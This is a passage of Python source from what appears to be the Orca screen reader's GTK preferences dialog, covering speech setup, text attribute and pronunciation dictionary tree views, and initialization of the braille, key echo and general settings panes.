        self.systemVoice    = acss.ACSS(voices.get(settings.SYSTEM_VOICE))

        # Just a note on general naming pattern:
        #
        # *        = The name of the combobox
        # *Model   = the name of the comobox model
        # *Choices = the Orca/speech python objects
        # *Choice  = a value from *Choices
        #
        # Where * = speechSystems, speechServers, speechLanguages, speechFamilies
        #
        factories = _settingsManager.getSpeechServerFactories()
        if len(factories) == 0 or not self.prefsDict.get('enableSpeech', True):
            self.workingFactories = []
            self.speechSystemsChoice = None
            self.speechServersChoices = []
            self.speechServersChoice = None
            self.speechLanguagesChoices = []
            self.speechLanguagesChoice = None
            self.speechFamiliesChoices = []
            self.speechFamiliesChoice = None
            return

        try:
            speech.init()
        except:
            self.workingFactories = []
            self.speechSystemsChoice = None
            self.speechServersChoices = []
            self.speechServersChoice = None
            self.speechLanguagesChoices = []
            self.speechLanguagesChoice = None
            self.speechFamiliesChoices = []
            self.speechFamiliesChoice = None
            return

        # This cascades into systems->servers->voice_type->families...
        #
        self.initializingSpeech = True
        self._setupSpeechSystems(factories)
        self.initializingSpeech = False

    def _setSpokenTextAttributes(self, view, setAttributes,
                                 state, moveToTop=False):
        """Given a set of spoken text attributes, update the model used by the
        text attribute tree view.

        Arguments:
        - view: the text attribute tree view.
        - setAttributes: the list of spoken text attributes to update.
        - state: the state (True or False) that they all should be set to.
        - moveToTop: if True, move these attributes to the top of the list.
        """

        model = view.get_model()
        view.set_model(None)

        [attrList, attrDict] = \
           self.script.utilities.stringToKeysAndDict(setAttributes)
        [allAttrList, allAttrDict] = self.script.utilities.stringToKeysAndDict(
            _settingsManager.getSetting('allTextAttributes'))

        for i in range(0, len(attrList)):
            for path in range(0, len(allAttrList)):
                localizedKey = text_attribute_names.getTextAttributeName(
                    attrList[i], self.script)
                localizedValue = text_attribute_names.getTextAttributeName(
                    attrDict[attrList[i]], self.script)
                if localizedKey == model[path][NAME]:
                    thisIter = model.get_iter(path)
                    model.set_value(thisIter, NAME, localizedKey)
                    model.set_value(thisIter, IS_SPOKEN, state)
                    model.set_value(thisIter, VALUE, localizedValue)
                    if moveToTop:
                        thisIter = model.get_iter(path)
                        otherIter = model.get_iter(i)
                        model.move_before(thisIter, otherIter)
                    break

        view.set_model(model)

    def _setBrailledTextAttributes(self, view, setAttributes, state):
        """Given a set of brailled text attributes, update the model used
        by the text attribute tree view.

        Arguments:
        - view: the text attribute tree view.
        - setAttributes: the list of brailled text attributes to update.
        - state: the state (True or False) that they all should be set to.
        """

        model = view.get_model()
        view.set_model(None)

        [attrList, attrDict] = \
            self.script.utilities.stringToKeysAndDict(setAttributes)
        [allAttrList, allAttrDict] = self.script.utilities.stringToKeysAndDict(
                _settingsManager.getSetting('allTextAttributes'))

        for i in range(0, len(attrList)):
            for path in range(0, len(allAttrList)):
                localizedKey = text_attribute_names.getTextAttributeName(
                    attrList[i], self.script)
                if localizedKey == model[path][NAME]:
                    thisIter = model.get_iter(path)
                    model.set_value(thisIter, IS_BRAILLED, state)
                    break

        view.set_model(model)

    def _getAppNameForAttribute(self, attributeName):
        """Converts the given Atk attribute name into the application's
        equivalent. This is necessary because an application or toolkit
        (e.g. Gecko) might invent entirely new names for the same text
        attributes.

        Arguments:
        - attribName: The name of the text attribute

        Returns the application's equivalent name if found or attribName
        otherwise.
        """

        return self.script.utilities.getAppNameForAttribute(attributeName)

    def _updateTextDictEntry(self):
        """The user has updated the text attribute list in some way. Update
        the "enabledSpokenTextAttributes" and "enabledBrailledTextAttributes"
        preference strings to reflect the current state of the corresponding
        text attribute lists.
        """

        model = self.getTextAttributesView.get_model()
        spokenAttrStr = ""
        brailledAttrStr = ""
        noRows = model.iter_n_children(None)
        for path in range(0, noRows):
            localizedKey = model[path][NAME]
            key = text_attribute_names.getTextAttributeKey(localizedKey)

            # Convert the normalized, Atk attribute name back into what
            # the app/toolkit uses.
            #
            key = self._getAppNameForAttribute(key)

            localizedValue = model[path][VALUE]
            value = text_attribute_names.getTextAttributeKey(localizedValue)

            if model[path][IS_SPOKEN]:
                spokenAttrStr += key + ":" + value + "; "
            if model[path][IS_BRAILLED]:
                brailledAttrStr += key + ":" + value + "; "

        self.prefsDict["enabledSpokenTextAttributes"] = spokenAttrStr
        self.prefsDict["enabledBrailledTextAttributes"] = brailledAttrStr

    def contractedBrailleToggled(self, checkbox):
        grid = self.get_widget('contractionTableGrid')
        grid.set_sensitive(checkbox.get_active())
        self.prefsDict["enableContractedBraille"] = checkbox.get_active()

    def contractionTableComboChanged(self, combobox):
        model = combobox.get_model()
        myIter = combobox.get_active_iter()
        self.prefsDict["brailleContractionTable"] = model[myIter][1]

    def flashPersistenceToggled(self, checkbox):
        grid = self.get_widget('flashMessageDurationGrid')
        grid.set_sensitive(not checkbox.get_active())
        self.prefsDict["flashIsPersistent"] = checkbox.get_active()
        
    def textAttributeSpokenToggled(self, cell, path, model):
        """The user has toggled the state of one of the text attribute
        checkboxes to be spoken. Update our model to reflect this, then
        update the "enabledSpokenTextAttributes" preference string.

        Arguments:
        - cell: the cell that changed.
        - path: the path of that cell.
        - model: the model that the cell is part of.
        """

        thisIter = model.get_iter(path)
        model.set(thisIter, IS_SPOKEN, not model[path][IS_SPOKEN])
        self._updateTextDictEntry()

    def textAttributeBrailledToggled(self, cell, path, model):
        """The user has toggled the state of one of the text attribute
        checkboxes to be brailled. Update our model to reflect this,
        then update the "enabledBrailledTextAttributes" preference string.

        Arguments:
        - cell: the cell that changed.
        - path: the path of that cell.
        - model: the model that the cell is part of.
        """

        thisIter = model.get_iter(path)
        model.set(thisIter, IS_BRAILLED, not model[path][IS_BRAILLED])
        self._updateTextDictEntry()

    def textAttrValueEdited(self, cell, path, new_text, model):
        """The user has edited the value of one of the text attributes.
        Update our model to reflect this, then update the
        "enabledSpokenTextAttributes" and "enabledBrailledTextAttributes"
        preference strings.

        Arguments:
        - cell: the cell that changed.
        - path: the path of that cell.
        - new_text: the new text attribute value string.
        - model: the model that the cell is part of.
        """

        thisIter = model.get_iter(path)
        model.set(thisIter, VALUE, new_text)
        self._updateTextDictEntry()

    def textAttrCursorChanged(self, widget):
        """Set the search column in the text attribute tree view
        depending upon which column the user currently has the cursor in.
        """

        [path, focusColumn] = self.getTextAttributesView.get_cursor()
        if focusColumn:
            noColumns = len(self.getTextAttributesView.get_columns())
            for i in range(0, noColumns):
                col = self.getTextAttributesView.get_column(i)
                if focusColumn == col:
                    self.getTextAttributesView.set_search_column(i)
                    break

    def _createTextAttributesTreeView(self):
        """Create the text attributes tree view. The view is the
        textAttributesTreeView GtkTreeView widget. The view will consist
        of a list containing three columns:
          IS_SPOKEN - a checkbox whose state indicates whether this text
                      attribute will be spoken or not.
          NAME      - the text attribute name.
          VALUE     - if set, (and this attributes is enabled for speaking),
                      then this attribute will be spoken unless it equals
                      this value.
        """

        self.getTextAttributesView = self.get_widget("textAttributesTreeView")

        if self.getTextAttributesView.get_columns():
            for column in self.getTextAttributesView.get_columns():
                self.getTextAttributesView.remove_column(column)

        model = Gtk.ListStore(GObject.TYPE_STRING,
                              GObject.TYPE_BOOLEAN,
                              GObject.TYPE_BOOLEAN,
                              GObject.TYPE_STRING)

        # Initially setup the list store model based on the values of all
        # the known text attributes.
        #
        [allAttrList, allAttrDict] = self.script.utilities.stringToKeysAndDict(
            _settingsManager.getSetting('allTextAttributes'))
        for i in range(0, len(allAttrList)):
            thisIter = model.append()
            localizedKey = text_attribute_names.getTextAttributeName(
                allAttrList[i], self.script)
            localizedValue = text_attribute_names.getTextAttributeName(
                allAttrDict[allAttrList[i]], self.script)
            model.set_value(thisIter, NAME, localizedKey)
            model.set_value(thisIter, IS_SPOKEN, False)
            model.set_value(thisIter, IS_BRAILLED, False)
            model.set_value(thisIter, VALUE, localizedValue)

        self.getTextAttributesView.set_model(model)

        # Attribute Name column (NAME).
        column = Gtk.TreeViewColumn(guilabels.TEXT_ATTRIBUTE_NAME)
        column.set_min_width(250)
        column.set_resizable(True)
        renderer = Gtk.CellRendererText()
        column.pack_end(renderer, True)
        column.add_attribute(renderer, 'text', NAME)
        self.getTextAttributesView.insert_column(column, 0)

        # Attribute Speak column (IS_SPOKEN).
        speakAttrColumnLabel = guilabels.PRESENTATION_SPEAK
        column = Gtk.TreeViewColumn(speakAttrColumnLabel)
        renderer = Gtk.CellRendererToggle()
        column.pack_start(renderer, False)
        column.add_attribute(renderer, 'active', IS_SPOKEN)
        renderer.connect("toggled",
                         self.textAttributeSpokenToggled,
                         model)
        self.getTextAttributesView.insert_column(column, 1)
        column.clicked()

        # Attribute Mark in Braille column (IS_BRAILLED).
        markAttrColumnLabel = guilabels.PRESENTATION_MARK_IN_BRAILLE
        column = Gtk.TreeViewColumn(markAttrColumnLabel)
        renderer = Gtk.CellRendererToggle()
        column.pack_start(renderer, False)
        column.add_attribute(renderer, 'active', IS_BRAILLED)
        renderer.connect("toggled",
                         self.textAttributeBrailledToggled,
                         model)
        self.getTextAttributesView.insert_column(column, 2)
        column.clicked()

        # Attribute Value column (VALUE)
        column = Gtk.TreeViewColumn(guilabels.PRESENTATION_PRESENT_UNLESS)
        renderer = Gtk.CellRendererText()
        renderer.set_property('editable', True)
        column.pack_end(renderer, True)
        column.add_attribute(renderer, 'text', VALUE)
        renderer.connect("edited", self.textAttrValueEdited, model)

        self.getTextAttributesView.insert_column(column, 4)

        # Check all the enabled (spoken) text attributes.
        #
        self._setSpokenTextAttributes(
            self.getTextAttributesView,
            _settingsManager.getSetting('enabledSpokenTextAttributes'),
            True, True)

        # Check all the enabled (brailled) text attributes.
        #
        self._setBrailledTextAttributes(
            self.getTextAttributesView,
            _settingsManager.getSetting('enabledBrailledTextAttributes'),
            True)

        # Connect a handler for when the user changes columns within the
        # view, so that we can adjust the search column for item lookups.
        #
        self.getTextAttributesView.connect("cursor_changed",
                                           self.textAttrCursorChanged)

    def pronActualValueEdited(self, cell, path, new_text, model):
        """The user has edited the value of one of the actual strings in
        the pronunciation dictionary. Update our model to reflect this.

        Arguments:
        - cell: the cell that changed.
        - path: the path of that cell.
        - new_text: the new pronunciation dictionary actual string.
        - model: the model that the cell is part of.
        """

        thisIter = model.get_iter(path)
        model.set(thisIter, ACTUAL, new_text)

    def pronReplacementValueEdited(self, cell, path, new_text, model):
        """The user has edited the value of one of the replacement strings
        in the pronunciation dictionary. Update our model to reflect this.

        Arguments:
        - cell: the cell that changed.
        - path: the path of that cell.
        - new_text: the new pronunciation dictionary replacement string.
        - model: the model that the cell is part of.
        """

        thisIter = model.get_iter(path)
        model.set(thisIter, REPLACEMENT, new_text)

    def pronunciationFocusChange(self, widget, event, isFocused):
        """Callback for the pronunciation tree's focus-{in,out}-event signal."""

        _settingsManager.setSetting('usePronunciationDictionary', not isFocused)

    def pronunciationCursorChanged(self, widget):
        """Set the search column in the pronunciation dictionary tree view
        depending upon which column the user currently has the cursor in.
        """

        [path, focusColumn] = self.pronunciationView.get_cursor()
        if focusColumn:
            noColumns = len(self.pronunciationView.get_columns())
            for i in range(0, noColumns):
                col = self.pronunciationView.get_column(i)
                if focusColumn == col:
                    self.pronunciationView.set_search_column(i)
                    break

    def _createPronunciationTreeView(self):
        """Create the pronunciation dictionary tree view. The view is the
        pronunciationTreeView GtkTreeView widget. The view will consist
        of a list containing two columns:
          ACTUAL      - the actual text string (word).
          REPLACEMENT - the string that is used to pronounce that word.
        """

        self.pronunciationView = self.get_widget("pronunciationTreeView")

        if self.pronunciationView.get_columns():
            for column in self.pronunciationView.get_columns():
                self.pronunciationView.remove_column(column)

        model = Gtk.ListStore(GObject.TYPE_STRING,
                              GObject.TYPE_STRING)

        # Initially setup the list store model based on the values of all
        # existing entries in the pronunciation dictionary -- unless it's
        # the default script.
        #
        if not self.script.app:
            _profile = self.prefsDict.get('activeProfile')[1]
            pronDict = _settingsManager.getPronunciations(_profile)
        else:
            pronDict = pronunciation_dict.pronunciation_dict
        for pronKey in sorted(pronDict.keys()):
            thisIter = model.append() 
            try:
                actual, replacement = pronDict[pronKey]
            except:
                # Try to do something sensible for the previous format of
                # pronunciation dictionary entries. See bug #464754 for
                # more details.
                #
                actual = pronKey
                replacement = pronDict[pronKey]
            model.set(thisIter, 
                      ACTUAL, actual,
                      REPLACEMENT, replacement)

        self.pronunciationView.set_model(model)

        # Pronunciation Dictionary actual string (word) column (ACTUAL).
        column = Gtk.TreeViewColumn(guilabels.DICTIONARY_ACTUAL_STRING)
        column.set_min_width(250)
        column.set_resizable(True)
        renderer = Gtk.CellRendererText()
        renderer.set_property('editable', True)
        column.pack_end(renderer, True) 
        column.add_attribute(renderer, 'text', ACTUAL)
        renderer.connect("edited", self.pronActualValueEdited, model)
        self.pronunciationView.insert_column(column, 0)

        # Pronunciation Dictionary replacement string column (REPLACEMENT)
        column = Gtk.TreeViewColumn(guilabels.DICTIONARY_REPLACEMENT_STRING)
        renderer = Gtk.CellRendererText()
        renderer.set_property('editable', True)
        column.pack_end(renderer, True)
        column.add_attribute(renderer, 'text', REPLACEMENT)
        renderer.connect("edited", self.pronReplacementValueEdited, model)
        self.pronunciationView.insert_column(column, 1)

        self.pronunciationModel = model

        # Connect a handler for when the user changes columns within the
        # view, so that we can adjust the search column for item lookups.
        #
        self.pronunciationView.connect("cursor_changed",
                                       self.pronunciationCursorChanged)

        self.pronunciationView.connect(
            "focus_in_event", self.pronunciationFocusChange, True)
        self.pronunciationView.connect(
            "focus_out_event", self.pronunciationFocusChange, False)

    def _initGUIState(self):
        """Adjust the settings of the various components on the
        configuration GUI depending upon the users preferences.
        """

        prefs = self.prefsDict

        # Speech pane.
        #
        enable = prefs["enableSpeech"]
        self.get_widget("speechSupportCheckButton").set_active(enable)
        self.get_widget("speechOptionsGrid").set_sensitive(enable)

        enable = prefs["onlySpeakDisplayedText"]
        self.get_widget("onlySpeakDisplayedTextCheckButton").set_active(enable)
        self.get_widget("contextOptionsGrid").set_sensitive(not enable)

        if prefs["verbalizePunctuationStyle"] == \
                               settings.PUNCTUATION_STYLE_NONE:
            self.get_widget("noneButton").set_active(True)
        elif prefs["verbalizePunctuationStyle"] == \
                               settings.PUNCTUATION_STYLE_SOME:
            self.get_widget("someButton").set_active(True)
        elif prefs["verbalizePunctuationStyle"] == \
                               settings.PUNCTUATION_STYLE_MOST:
            self.get_widget("mostButton").set_active(True)
        else:
            self.get_widget("allButton").set_active(True)

        if prefs["speechVerbosityLevel"] == settings.VERBOSITY_LEVEL_BRIEF:
            self.get_widget("speechBriefButton").set_active(True)
        else:
            self.get_widget("speechVerboseButton").set_active(True)

        self.get_widget("onlySpeakDisplayedTextCheckButton").set_active(
            prefs["onlySpeakDisplayedText"])

        self.get_widget("enableSpeechIndentationCheckButton").set_active(\
            prefs["enableSpeechIndentation"])

        self.get_widget("speakBlankLinesCheckButton").set_active(\
            prefs["speakBlankLines"])
        self.get_widget("speakMultiCaseStringsAsWordsCheckButton").set_active(\
            prefs["speakMultiCaseStringsAsWords"])
        self.get_widget("speakNumbersAsDigitsCheckButton").set_active(
            prefs.get("speakNumbersAsDigits", settings.speakNumbersAsDigits))
        self.get_widget("enableTutorialMessagesCheckButton").set_active(\
            prefs["enableTutorialMessages"])
        self.get_widget("enablePauseBreaksCheckButton").set_active(\
            prefs["enablePauseBreaks"])
        self.get_widget("enablePositionSpeakingCheckButton").set_active(\
            prefs["enablePositionSpeaking"])
        self.get_widget("enableMnemonicSpeakingCheckButton").set_active(\
            prefs["enableMnemonicSpeaking"])
        self.get_widget("speakMisspelledIndicatorCheckButton").set_active(
            prefs.get("speakMisspelledIndicator", settings.speakMisspelledIndicator))
        self.get_widget("speakDescriptionCheckButton").set_active(
            prefs.get("speakDescription", settings.speakDescription))
        self.get_widget("speakContextBlockquoteCheckButton").set_active(
            prefs.get("speakContextBlockquote", settings.speakContextList))
        self.get_widget("speakContextLandmarkCheckButton").set_active(
            prefs.get("speakContextLandmark", settings.speakContextLandmark))
        self.get_widget("speakContextNonLandmarkFormCheckButton").set_active(
            prefs.get("speakContextNonLandmarkForm", settings.speakContextNonLandmarkForm))
        self.get_widget("speakContextListCheckButton").set_active(
            prefs.get("speakContextList", settings.speakContextList))
        self.get_widget("speakContextPanelCheckButton").set_active(
            prefs.get("speakContextPanel", settings.speakContextPanel))
        self.get_widget("speakContextTableCheckButton").set_active(
            prefs.get("speakContextTable", settings.speakContextTable))

        enable = prefs.get("messagesAreDetailed", settings.messagesAreDetailed)
        self.get_widget("messagesAreDetailedCheckButton").set_active(enable)

        enable = prefs.get("useColorNames", settings.useColorNames)
        self.get_widget("useColorNamesCheckButton").set_active(enable)

        enable = prefs.get("readFullRowInGUITable", settings.readFullRowInGUITable)
        self.get_widget("readFullRowInGUITableCheckButton").set_active(enable)

        enable = prefs.get("readFullRowInDocumentTable", settings.readFullRowInDocumentTable)
        self.get_widget("readFullRowInDocumentTableCheckButton").set_active(enable)

        enable = prefs.get("readFullRowInSpreadSheet", settings.readFullRowInSpreadSheet)
        self.get_widget("readFullRowInSpreadSheetCheckButton").set_active(enable)

        style = prefs.get("capitalizationStyle", settings.capitalizationStyle)
        combobox = self.get_widget("capitalizationStyle")
        options = [guilabels.CAPITALIZATION_STYLE_NONE,
                   guilabels.CAPITALIZATION_STYLE_ICON,
                   guilabels.CAPITALIZATION_STYLE_SPELL]
        self.populateComboBox(combobox, options)
        if style == settings.CAPITALIZATION_STYLE_ICON:
            value = guilabels.CAPITALIZATION_STYLE_ICON
        elif style == settings.CAPITALIZATION_STYLE_SPELL:
            value = guilabels.CAPITALIZATION_STYLE_SPELL
        else:
            value = guilabels.CAPITALIZATION_STYLE_NONE
        combobox.set_active(options.index(value))

        combobox2 = self.get_widget("dateFormatCombo")
        sdtime = time.strftime
        ltime = time.localtime
        self.populateComboBox(combobox2,
          [sdtime(messages.DATE_FORMAT_LOCALE, ltime()),
           sdtime(messages.DATE_FORMAT_NUMBERS_DM, ltime()),
           sdtime(messages.DATE_FORMAT_NUMBERS_MD, ltime()),
           sdtime(messages.DATE_FORMAT_NUMBERS_DMY, ltime()),
           sdtime(messages.DATE_FORMAT_NUMBERS_MDY, ltime()),
           sdtime(messages.DATE_FORMAT_NUMBERS_YMD, ltime()),
           sdtime(messages.DATE_FORMAT_FULL_DM, ltime()),
           sdtime(messages.DATE_FORMAT_FULL_MD, ltime()),
           sdtime(messages.DATE_FORMAT_FULL_DMY, ltime()),
           sdtime(messages.DATE_FORMAT_FULL_MDY, ltime()),
           sdtime(messages.DATE_FORMAT_FULL_YMD, ltime()),
           sdtime(messages.DATE_FORMAT_ABBREVIATED_DM, ltime()),
           sdtime(messages.DATE_FORMAT_ABBREVIATED_MD, ltime()),
           sdtime(messages.DATE_FORMAT_ABBREVIATED_DMY, ltime()),
           sdtime(messages.DATE_FORMAT_ABBREVIATED_MDY, ltime()),
           sdtime(messages.DATE_FORMAT_ABBREVIATED_YMD, ltime())
          ])

        indexdate = DATE_FORMAT_LOCALE
        dateFormat = self.prefsDict["presentDateFormat"]
        if dateFormat == messages.DATE_FORMAT_LOCALE:
            indexdate = DATE_FORMAT_LOCALE
        elif dateFormat == messages.DATE_FORMAT_NUMBERS_DM:
            indexdate = DATE_FORMAT_NUMBERS_DM
        elif dateFormat == messages.DATE_FORMAT_NUMBERS_MD:
            indexdate = DATE_FORMAT_NUMBERS_MD
        elif dateFormat == messages.DATE_FORMAT_NUMBERS_DMY:
            indexdate = DATE_FORMAT_NUMBERS_DMY
        elif dateFormat == messages.DATE_FORMAT_NUMBERS_MDY:
            indexdate = DATE_FORMAT_NUMBERS_MDY
        elif dateFormat == messages.DATE_FORMAT_NUMBERS_YMD:
            indexdate = DATE_FORMAT_NUMBERS_YMD
        elif dateFormat == messages.DATE_FORMAT_FULL_DM:
            indexdate = DATE_FORMAT_FULL_DM
        elif dateFormat == messages.DATE_FORMAT_FULL_MD:
            indexdate = DATE_FORMAT_FULL_MD
        elif dateFormat == messages.DATE_FORMAT_FULL_DMY:
            indexdate = DATE_FORMAT_FULL_DMY
        elif dateFormat == messages.DATE_FORMAT_FULL_MDY:
            indexdate = DATE_FORMAT_FULL_MDY
        elif dateFormat == messages.DATE_FORMAT_FULL_YMD:
            indexdate = DATE_FORMAT_FULL_YMD
        elif dateFormat == messages.DATE_FORMAT_ABBREVIATED_DM:
            indexdate = DATE_FORMAT_ABBREVIATED_DM
        elif dateFormat == messages.DATE_FORMAT_ABBREVIATED_MD:
            indexdate = DATE_FORMAT_ABBREVIATED_MD
        elif dateFormat == messages.DATE_FORMAT_ABBREVIATED_DMY:
            indexdate = DATE_FORMAT_ABBREVIATED_DMY
        elif dateFormat == messages.DATE_FORMAT_ABBREVIATED_MDY:
            indexdate = DATE_FORMAT_ABBREVIATED_MDY
        elif dateFormat == messages.DATE_FORMAT_ABBREVIATED_YMD:
            indexdate = DATE_FORMAT_ABBREVIATED_YMD
        combobox2.set_active (indexdate)
        
        combobox3 = self.get_widget("timeFormatCombo")
        self.populateComboBox(combobox3,
          [sdtime(messages.TIME_FORMAT_LOCALE, ltime()),
           sdtime(messages.TIME_FORMAT_12_HM, ltime()),
           sdtime(messages.TIME_FORMAT_12_HMS, ltime()),
           sdtime(messages.TIME_FORMAT_24_HMS, ltime()),
           sdtime(messages.TIME_FORMAT_24_HMS_WITH_WORDS, ltime()),
           sdtime(messages.TIME_FORMAT_24_HM, ltime()),
           sdtime(messages.TIME_FORMAT_24_HM_WITH_WORDS, ltime())])
        indextime = TIME_FORMAT_LOCALE
        timeFormat = self.prefsDict["presentTimeFormat"]
        if timeFormat == messages.TIME_FORMAT_LOCALE:
            indextime = TIME_FORMAT_LOCALE
        elif timeFormat == messages.TIME_FORMAT_12_HM:
            indextime = TIME_FORMAT_12_HM
        elif timeFormat == messages.TIME_FORMAT_12_HMS:
            indextime = TIME_FORMAT_12_HMS
        elif timeFormat == messages.TIME_FORMAT_24_HMS:
            indextime = TIME_FORMAT_24_HMS
        elif timeFormat == messages.TIME_FORMAT_24_HMS_WITH_WORDS:
            indextime = TIME_FORMAT_24_HMS_WITH_WORDS
        elif timeFormat == messages.TIME_FORMAT_24_HM:
            indextime = TIME_FORMAT_24_HM
        elif timeFormat == messages.TIME_FORMAT_24_HM_WITH_WORDS:
            indextime = TIME_FORMAT_24_HM_WITH_WORDS
        combobox3.set_active (indextime)

        self.get_widget("speakProgressBarUpdatesCheckButton").set_active(
            prefs.get("speakProgressBarUpdates", settings.speakProgressBarUpdates))
        self.get_widget("brailleProgressBarUpdatesCheckButton").set_active(
            prefs.get("brailleProgressBarUpdates", settings.brailleProgressBarUpdates))
        self.get_widget("beepProgressBarUpdatesCheckButton").set_active(
            prefs.get("beepProgressBarUpdates", settings.beepProgressBarUpdates))

        interval = prefs["progressBarUpdateInterval"]
        self.get_widget("progressBarUpdateIntervalSpinButton").set_value(interval)

        comboBox = self.get_widget("progressBarVerbosity")
        levels = [guilabels.PROGRESS_BAR_ALL,
                  guilabels.PROGRESS_BAR_APPLICATION,
                  guilabels.PROGRESS_BAR_WINDOW]
        self.populateComboBox(comboBox, levels)
        comboBox.set_active(prefs["progressBarVerbosity"])

        enable = prefs["enableMouseReview"]
        self.get_widget("enableMouseReviewCheckButton").set_active(enable)

        # Braille pane.
        #
        self.get_widget("enableBrailleCheckButton").set_active( \
                        prefs["enableBraille"])
        state = prefs["brailleRolenameStyle"] == \
                            settings.BRAILLE_ROLENAME_STYLE_SHORT
        self.get_widget("abbrevRolenames").set_active(state)

        self.get_widget("disableBrailleEOLCheckButton").set_active(
            prefs["disableBrailleEOL"])

        if louis is None:
            self.get_widget( \
                "contractedBrailleCheckButton").set_sensitive(False)
        else:
            self.get_widget("contractedBrailleCheckButton").set_active( \
                prefs["enableContractedBraille"])
            # Set up contraction table combo box and set it to the
            # currently used one.
            # 
            tablesCombo = self.get_widget("contractionTableCombo")
            tableDict = braille.listTables()
            selectedTableIter = None
            selectedTable = prefs["brailleContractionTable"] or \
                             braille.getDefaultTable()
            if tableDict:
                tablesModel = Gtk.ListStore(str, str)
                names = sorted(tableDict.keys())
                for name in names:
                    fname = tableDict[name]
                    it = tablesModel.append([name, fname])
                    if os.path.join(braille.tablesdir, fname) == \
                            selectedTable:
                        selectedTableIter = it
                cell = self.planeCellRendererText
                tablesCombo.clear()
                tablesCombo.pack_start(cell, True)
                tablesCombo.add_attribute(cell, 'text', 0)
                tablesCombo.set_model(tablesModel)
                if selectedTableIter:
                    tablesCombo.set_active_iter(selectedTableIter)
                else:
                    tablesCombo.set_active(0)
            else:
                tablesCombo.set_sensitive(False)
        if prefs["brailleVerbosityLevel"] == settings.VERBOSITY_LEVEL_BRIEF:
            self.get_widget("brailleBriefButton").set_active(True)
        else:
            self.get_widget("brailleVerboseButton").set_active(True)

        self.get_widget("enableBrailleWordWrapCheckButton").set_active(
            prefs.get("enableBrailleWordWrap", settings.enableBrailleWordWrap))

        selectionIndicator = prefs["brailleSelectorIndicator"]
        if selectionIndicator == settings.BRAILLE_UNDERLINE_7:
            self.get_widget("brailleSelection7Button").set_active(True)
        elif selectionIndicator == settings.BRAILLE_UNDERLINE_8:
            self.get_widget("brailleSelection8Button").set_active(True)
        elif selectionIndicator == settings.BRAILLE_UNDERLINE_BOTH:
            self.get_widget("brailleSelectionBothButton").set_active(True)
        else:
            self.get_widget("brailleSelectionNoneButton").set_active(True)

        linkIndicator = prefs["brailleLinkIndicator"]
        if linkIndicator == settings.BRAILLE_UNDERLINE_7:
            self.get_widget("brailleLink7Button").set_active(True)
        elif linkIndicator == settings.BRAILLE_UNDERLINE_8:
            self.get_widget("brailleLink8Button").set_active(True)
        elif linkIndicator == settings.BRAILLE_UNDERLINE_BOTH:
            self.get_widget("brailleLinkBothButton").set_active(True)
        else:
            self.get_widget("brailleLinkNoneButton").set_active(True)

        enable = prefs.get("enableFlashMessages", settings.enableFlashMessages)
        self.get_widget("enableFlashMessagesCheckButton").set_active(enable)

        enable = prefs.get("flashIsPersistent", settings.flashIsPersistent)
        self.get_widget("flashIsPersistentCheckButton").set_active(enable)

        enable = prefs.get("flashIsDetailed", settings.flashIsDetailed)
        self.get_widget("flashIsDetailedCheckButton").set_active(enable)

        duration = prefs["brailleFlashTime"]
        self.get_widget("brailleFlashTimeSpinButton").set_value(duration / 1000)

        # Key Echo pane.
        #
        self.get_widget("keyEchoCheckButton").set_active( \
                        prefs["enableKeyEcho"])
        self.get_widget("enableAlphabeticKeysCheckButton").set_active(
                        prefs.get("enableAlphabeticKeys", settings.enableAlphabeticKeys))
        self.get_widget("enableNumericKeysCheckButton").set_active(
                        prefs.get("enableNumericKeys", settings.enableNumericKeys))
        self.get_widget("enablePunctuationKeysCheckButton").set_active(
                        prefs.get("enablePunctuationKeys", settings.enablePunctuationKeys))
        self.get_widget("enableSpaceCheckButton").set_active(
                        prefs.get("enableSpace", settings.enableSpace))
        self.get_widget("enableModifierKeysCheckButton").set_active( \
                        prefs["enableModifierKeys"])
        self.get_widget("enableFunctionKeysCheckButton").set_active( \
                        prefs["enableFunctionKeys"])
        self.get_widget("enableActionKeysCheckButton").set_active( \
                        prefs["enableActionKeys"])
        self.get_widget("enableNavigationKeysCheckButton").set_active( \
                        prefs["enableNavigationKeys"])
        self.get_widget("enableDiacriticalKeysCheckButton").set_active( \
                        prefs["enableDiacriticalKeys"])
        self.get_widget("enableEchoByCharacterCheckButton").set_active( \
                        prefs["enableEchoByCharacter"])
        self.get_widget("enableEchoByWordCheckButton").set_active( \
                        prefs["enableEchoByWord"])
        self.get_widget("enableEchoBySentenceCheckButton").set_active( \
                        prefs["enableEchoBySentence"])
        
        # Text attributes pane.
        #
        self._createTextAttributesTreeView()

        brailleIndicator = prefs["textAttributesBrailleIndicator"]
        if brailleIndicator == settings.BRAILLE_UNDERLINE_7:
            self.get_widget("textBraille7Button").set_active(True)
        elif brailleIndicator == settings.BRAILLE_UNDERLINE_8:
            self.get_widget("textBraille8Button").set_active(True)
        elif brailleIndicator == settings.BRAILLE_UNDERLINE_BOTH:
            self.get_widget("textBrailleBothButton").set_active(True)
        else:
            self.get_widget("textBrailleNoneButton").set_active(True)

        # Pronunciation dictionary pane.
        #
        self._createPronunciationTreeView()

        # General pane.
        #
        self.get_widget("presentToolTipsCheckButton").set_active(
            prefs["presentToolTips"])

        if prefs["keyboardLayout"] == settings.GENERAL_KEYBOARD_LAYOUT_DESKTOP:
            self.get_widget("generalDesktopButton").set_active(True)
        else:
            self.get_widget("generalLaptopButton").set_active(True)
        
        combobox = self.get_widget("sayAllStyle")
        self.populateComboBox(combobox, [guilabels.SAY_ALL_STYLE_LINE,
                                         guilabels.SAY_ALL_STYLE_SENTENCE])
        combobox.set_active(prefs["sayAllStyle"])
        self.get_widget("rewindAndFastForwardInSayAllCheckButton").set_active(
            prefs.get("rewindAndFastForwardInSayAll", settings.rewindAndFastForwardInSayAll))
        self.get_widget("structNavInSayAllCheckButton").set_active(
            prefs.get("structNavInSayAll", settings.structNavInSayAll))
        self.get_widget("sayAllContextBlockquoteCheckButton").set_active(
            prefs.get("sayAllContextBlockquote", settings.sayAllContextBlockquote))
        self.get_widget("sayAllContextLandmarkCheckButton").set_active(
            prefs.get("sayAllContextLandmark", settings.sayAllContextLandmark))
        self.get_widget("sayAllContextNonLandmarkFormCheckButton").set_active(
            prefs.get("sayAllContextNonLandmarkForm", settings.sayAllContextNonLandmarkForm))
        self.get_widget("sayAllContextListCheckButton").set_active(
            prefs.get("sayAllContextList", settings.sayAllContextList))
        self.get_widget("sayAllContextPanelCheckButton").set_active(
            prefs.get("sayAllContextPanel", settings.sayAllContextPanel))
        self.get_widget("sayAllContextTableCheckButton").set_active(
            prefs.get("sayAllContextTable", settings.sayAllContextTable))

        # Orca User Profiles
        #
        self.profilesCombo = self.get_widget('availableProfilesComboBox1')
